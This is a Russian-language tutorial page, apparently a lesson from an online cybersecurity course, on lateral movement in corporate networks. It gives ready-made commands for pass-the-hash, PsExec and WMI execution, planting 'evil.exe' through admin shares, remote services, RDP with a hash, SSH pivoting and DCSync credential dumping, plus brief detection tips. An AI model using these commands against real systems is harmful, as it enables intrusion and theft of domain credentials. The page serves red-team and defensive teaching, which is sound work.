Методы горизонтального перемещения
Перемещайтесь по сетям с помощью WMI, PsExec, WinRM и общих ресурсов SMB, не вызывая предупреждений.
«Методы горизонтального перемещения» — бесплатный урок Cyber Security Academy на CoddyKit. Это урок 3 из 4. Ты можешь прочитать весь урок бесплатно ниже — а потом практиковать его прямо в браузере с встроенным редактором кода и ИИ-репетитором 24/7. Это часть пути обучения Cyber Security Academy, и твой прогресс синхронизируется между веб-версией и приложением CoddyKit. Курс Cyber Security Academy содержит 4 уроков всего.
Что такое латеральное перемещение?
Латеральное перемещение — это совокупность методов, которые злоумышленники используют для последовательного продвижения по сети после первоначальной компрометации: от первой точки опоры к более ценным целям, таким как контроллеры домена, базы данных и системы резервного копирования.
Передача хэша (PtH)
Аутентификация Windows NTLM позволяет использовать хэш пароля напрямую вместо пароля в открытом виде. Злоумышленник, извлекший хэши NTLM, может пройти аутентификацию в других системах без взлома хэша.
# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5
# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASHПередача билета (PtT)
Билеты Kerberos (TGT или TGS) можно извлечь из памяти и импортировать, чтобы пройти аутентификацию от имени владельца билета. Атаки «золотого билета» подделывают TGT с использованием хэша KRBTGT, предоставляя неограниченный доступ Kerberos к домену.
Удалённое выполнение кода: PSExec
psexec (Sysinternals и Impacket) выполняет команды на удалённых узлах Windows через SMB или административные общие ресурсы. Требуются учётные данные администратора. На целевой системе создаётся двоичный файл службы.
impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexecЛатеральное перемещение с помощью WMI
Windows Management Instrumentation обеспечивает удалённое выполнение кода без создания файлов, которые могут обнаруживать многие инструменты:
# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")SMB и административные общие ресурсы
Административные общие ресурсы Windows (C$, ADMIN$, IPC$) позволяют перемещаться по сети с учётными данными администратора:
# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5Удалённые службы: sc и at
Создавайте службы или запланированные задания на удалённых системах:
# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc
# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"RDP и интерактивные сеансы
RDP (протокол удалённого рабочего стола, порт 3389) предоставляет полный интерактивный доступ. Злоумышленники используют RDP с украденными учётными данными. Защита: ограничьте RDP серверами перехода, требуйте NLA и ведите журнал всех сеансов.
# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5SSH как средство латерального перемещения
В средах Linux SSH с украденными ключами или учётными данными позволяет перемещаться по сети. Злоупотребление перенаправлением агента позволяет переходить через скомпрометированные узлы. Туннели SSH перенаправляют порты, обеспечивая доступ к системам, которые иначе недоступны.
# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_hostРепликация Active Directory (DCSync)
DCSync злоупотребляет репликацией AD, чтобы напрямую извлекать хэши паролей с DC, не выполняя на нём код. Требуется привилегия DS-Replication-Get-Changes-All:
# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgtОбнаружение латерального перемещения
Признаки обнаружения:
- Событие 4624 (вход) с необычными входами типа 3 (сетевыми)
- Создание служб на удалённых узлах (событие 7045)
- Соединения SMB между рабочими станциями
- Создание процессов WMI на удалённых узлах
- Аномальное поведение учётных записей (пользователь входит в систему с нескольких компьютеров)
Быстрая проверка: латеральное перемещение
Какой метод позволяет злоумышленнику пройти аутентификацию в системах Windows с использованием перехваченного хэша NTLM без его взлома?
Итоги урока
Латеральное перемещение использует скомпрометированные учётные данные и протоколы для распространения по сети. Основные методы: передача хэша (повторное использование хэша NTLM), передача билета (Kerberos), PSExec/WMI/SMB для удалённого выполнения и DCSync для сбора учётных данных домена. Обнаружение: необычные сетевые входы (событие 4624), создание удалённых служб (событие 7045), SMB-трафик между рабочими станциями.
Изучай Cyber Security Academy с ИИ-репетитором — бесплатно
Пиши и запускай код прямо в браузере, получай мгновенную помощь от ИИ-репетитора 24/7 и продолжи учиться на сайте или в приложении.
- Курсы
- 76
- Уроки
- 303
Часто задаваемые вопросы
Урок «Методы горизонтального перемещения» бесплатный?
Да — полный текст урока «Методы горизонтального перемещения» бесплатно доступен здесь в веб-версии. Чтобы практиковать его интерактивно (встроенный редактор кода и ИИ-репетитор 24/7) и разблокировать остальной курс Cyber Security Academy, подпишись на CoddyKit PRO. Курс Cyber Security Academy содержит 4 уроков всего.
Чему я научусь в уроке «Методы горизонтального перемещения»?
Перемещайтесь по сетям с помощью WMI, PsExec, WinRM и общих ресурсов SMB, не вызывая предупреждений. Ты практикуешь Cyber Security Academy с помощью реального кода, который запускаешь прямо в браузере, и ИИ-репетитор 24/7 отвечает на твои вопросы во время урока.
Нужен ли мне опыт, чтобы начать Cyber Security Academy?
Предыдущий опыт не требуется. Cyber Security Academy на CoddyKit структурирован для всех уровней — от новичков до продвинутых, поэтому ты можешь начать отсюда или с самого начала и учиться в своем темпе. Это урок 3 из 4.
Сколько времени занимает урок «Методы горизонтального перемещения»?
Большинство уроков CoddyKit занимают около 5–10 минут. Каждый из них компактный и интерактивный, поэтому ты постоянно делаешь прогресс и продолжаешь с того же места в веб-версии и приложении.
Можно ли писать и запускать код в этом уроке Cyber Security Academy?
Да. Каждый урок Cyber Security Academy включает встроенный редактор кода, поэтому ты пишешь и запускаешь реальный код прямо в браузере и получаешь моментальную обратную связь от AI — локальная установка не требуется.
Все уроки этого курса
- Фреймворки C2: Cobalt Strike и Sliver
- Бинарные файлы Living-Off-the-Land (LOLBins)
- Методы горизонтального перемещения
- Составление отчётов красной команды